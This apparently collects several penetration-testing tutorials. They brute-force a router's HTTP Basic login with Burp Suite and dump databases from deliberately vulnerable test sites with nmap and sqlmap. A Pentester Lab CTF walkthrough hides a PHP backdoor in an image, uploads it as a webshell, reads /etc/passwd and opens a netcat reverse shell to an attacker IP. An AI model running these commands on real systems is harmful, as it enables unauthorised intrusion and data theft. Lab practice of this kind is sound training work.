Hack the Basic HTTP Authentication using Burpsuite

In the context of a HTTP transaction, basic access authentication is a method for a HTTP user agent to provide a user name and password when making a request.

HTTP Basic authentication (BA) implementation is the simplest technique for enforcing access controls to web resources because it doesn't require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.

The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely encoded with Base64 in transit, but not encrypted or hashed in any way. HTTPS is, therefore, typically preferred used in conjunction with Basic Authentication.

For more details read from wikipedia.org

Attacker: Kali Linux

Target: TP link Router

In this article I will perform an attack on router and try to bypass its authentication. In order to bypass user authentication page I am going to explore router IP: 192.168.1.1 on browser. Here now you can see it asking for user credential to get inside the control panel of router.  

Since I am unaware of user’s credential I had just typed the random value for authentication in order to fetch the request through burp suite. So before you sent the request to server turn on the burp suite and select proxy tab then click on intercept is on after then send the user authentication by clicking ok.

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlight some value in the last line. Here it tells the type of authentication provided by router is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64

Now time to generate the encoded value for authentication inside the burp suite. Click on action tab select send to intruder for brute attack.

Now open intruder frame and click on position. Configure the position where payload will be inserted into request. The attack type determines the way in which the payload assigned to payload position Now select the encoded value of authentication for payload position and click to ADD button on the left side of frame.

The base64 encoded value of Authentication is combination of username and password now the scenario is to generate same encoded value of authentication with help of user password dictionary Therefore I have made a dictionary which contains both user password names in text file and save it on the desktop. Later use this dictionary under burp suite through intruder as payload for brute force attack.

In order to use dictionary as payload click on payload tab under intruder; now load your dictionary which contains user password names from payload options. But we want to send request in encoded value of our payload. To encode your payload click on ADD button available under payload processing

A new dialog box will generate to select the rule choose encode option from list; now select base 64 from drag down list of URL encode key character for payload processing.

This will start brute force attack and try to match string for user authentication. In screenshot you can the status and length of the highlighted value is different from rest of values. This means we can use this encoded value to bypass the user authentication which occur from request number 6. Now check the username and password of 6^th line in dictionary. In dictionary I found admin: ps******** have matching authentication.

Now again open the router IP and this time type the above username and password. From screenshot you can see I have successfully login in control panel of router.

Exploiting Sql Injection with Nmap and Sqlmap

This article is about how to scan any target for sql injection using NMAP and then exploit the target with sqlmap if NMAP finds the target is vulnerable to sql injection. Now go with this tutorial for more details.

Firstly Type www.vulnweb.com in URL to browse acunetix web application. Then Click the link given for the URL of Acuart as shown in screenshot.

Here the required web page will get opened; testphp.vulnweb.com is our targeted host and now scans this target using nmap to identifying the possibilities of sql injection.

NMAP has NSE Script for http sql injection vulnerabilities and scan the web application for sql injection.

Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.

The script spiders an HTTP server looking for URLs containing queries. It then proceeds to combine crafted SQL commands with susceptible URLs in order to obtain errors. The errors are analyzed to see if the URL is vulnerable to attack. This uses the most basic form of SQL injection but anything more complicated is better suited to a standalone tool.

We may not have access to the target web server's true hostname, which can prevent access to virtually hosted sites.

Now type the following command to scan the target for sql injection possibilities.

nmap -sV  --script=http-sql-injection www. testphp.vulnweb.com –p 80

From the screenshot you can perceive that it has dumped the possible sql injection for queries. Now let’s explore this query in browser.

Note: please remove http:// from resultant queries while browsing.

This page contains some message or warning related to some kind of error in database query.  Now let’s try to apply sql injection using above resultant sqli query of NMAP inside sqlmap and try to figure out whether the result from nmap is correct for sql injection vulnerability or not.

Open the terminal in kali Linux and type following command for sqlmap

sqlmap -u http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider –dbs –batch

 We have got database name from the above resultant sqli query of NMAP inside sqlmap. You can read the database name acuart from the given screenshot.

Now try to find out entire data under this URL by typing following command.

sqlmap -u http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider –D acuart –dump-all

This will dump all available information inside the database. Now try it by yourself.

Easy way to Hack Database using Wizard switch in Sqlmap

Sqlmap provides wizard options for beiggner  and save your much time. So start your kali Linux and open the terminal and now the following command to use wizard interface of sqlmap.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard

Type 1 for normal; to select the injection difficulty. Now again type 1 for basic enumeration.

It will automatically dump the basic detail of backend server. Here you can see from the given screenshot it shown that web application technology is nginx , PHP 5.3.10 and operating system is Linux Ubuntu and many more things. 

Now change level for penetration testing of web with sqlmap wizard. Again type the same command.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" –wizard

Type 2 for medium; to select the injection difficulty. Now again type 2 for intermidate enumeration.

 Wonderful!!!  We have got database name and all table names with columns.

Now again change level for penetration testing of web with sqlmap wizard. Repeat the same command.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" –wizard

Type 3 for hard; to select the injection difficulty. Now again type 3 for All enumeration.

Awesome within three steps we have got entire information of acurat database. You can see the result from the screenshot.

Here we have all tables with its field details and column details.

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Hello friends!! Today we are going to solve another CTF challenge “From SQL injection to Shell II” and you can read part 1 form here. This VM is developed by Pentester Lab.  You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/

Install the iso image in VM ware and start it. The task given in this lab is to gain access of administration console and upload PHP webshell.

Level: Intermidate

Penetrating Methodologies

§  Network Scanning (Nmap)

§  Vulnerable to Blind Time-Base SQL Injection

§  Exploiting SQL Injection (SQLMAP)

§  Hiding web shell inside Image (exiftool)

§  Uploading Web shell

§  Spawning Shell (Netcat)

Walkthrough

The target holds 192.168.1.102 as network IP; now using nmap lets find out open ports.

nmap -A 192.168.1.102

Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test; ruxcon; 2010; all pictures; admin. Click on test.

The given URL: http://192.168.1.102/cat.php?id=1 will run sql query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding(‘) apostrophe at last of URL:

Unfortunately this page is not vulnerable to error base SQL injection as author already mention here you will learn “Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell”

Then I had used acunetix to scan the target which has declared the level of threat is high for blind sql injection.

Hence it is clear that exploit the target through sql injection.

And after little more research work I found the way to exploit it using sqlmap.

sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” --dbs --dump-all--batch

If you remembered the title of web page was “An Awesome Photoblog” hence name of database must be photoblog.

Now let’s fetch entire data under photoblog database through following command:

sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” -D photoblog --dump-all--batch

Now try to use above credential to access administration console, again open target IP: 192.168.0.105 in browser and click on login tab and type login as admin and password as P4ssw0rd.

Congrats!!! The first task is completed.

Now last task is to upload PHP webshell. Under administration console you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload image.

I tried to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.

Then I use exiftool to bind a malicious php file which will generate a remote code execution vulnerability, once get uploaded. To perform this I downloaded an image “1.png” and copied simple-backdoor.php from this path: /usr/share/webshells/php/ on the desktop for binding it with downloaded image.

Now type command for exiftool to hide malicious code of php file inside the png image.

cd Desktop

exiftool “-comment<= simple-backdoor.php” 1.png

exiftool 1.png

As you can observe, the malicious code is hidden inside the image. 

Now I had browse 1.png to add it as new image which is our php webshell.

Our malicious file successfully uploaded on web server. You can see a new row is added as webshell php which contains our php backdoor, now click on backdoor.

Yuppie we have uploaded the image with hidden backdoor inside, now try execute it.

After inspecting its source code we found link uploaded image, now let’s try to open it.

As we knew the image contain a web shell that will allow remote code execution, therefore, after exploring above enumerated path, I try to get /etc/passwd file.  

http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/password

And you can observe, we have successfully pulled the passwd file successfully, hence now can spwan victim’s shell through it.

Let’s run netcat listener in the terminal and execute netcat reverse connection for spawning web shell.

nc -lvp 1234

http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 6666 -e /bin/sh

Superb!!! We completed our last challenge also here we have spawned victim web shell.

SQL Injection Exploitation in Multiple Targets using Sqlmap

In this article we are going to perform sql injection attack on multiple target through sqlmap

In the tutorial I had used two buggy web dvwa and Acurat (vulweb.com). 

Start dvwa  and select sql injection vulnerbility here type user ID and click on submit, now copy the url.

Start kali linux then create a text file as sql.txt on desktop which will contain URL for multiple target and past copied url in text file. From the screenshot you can perceive that I had pasted above url in this text file and save as sql.txt

Repeat the same process with different web. Now open the vulnweb.com, here click on URL given for Acuart.

Now click on browse categories then click on poster

Now let verify whether the ID is vulnerable to sql injection or not. Use this apostrophe (‘) at the end of url as shown in the screenshot. You can see I have received an error message which means the ID is vulnerable to sql injection. Copy its URL

Paste above copied URL under sql.txt, and save it again. So here I have saved two URL in a text file which means two vulnerable ID of different web is saved under sql.txt file.

Open the terminal and type following command to scan multiple targets through sqlmap for sql injection.

Sqlmap –m /root/Desktop/sql.txt –dbs --batch

So here you can see I have got database names for multiple targets.  Here I found dvwa under database names.

Later I have got another database name acurat. Now try yourself for multiple ID.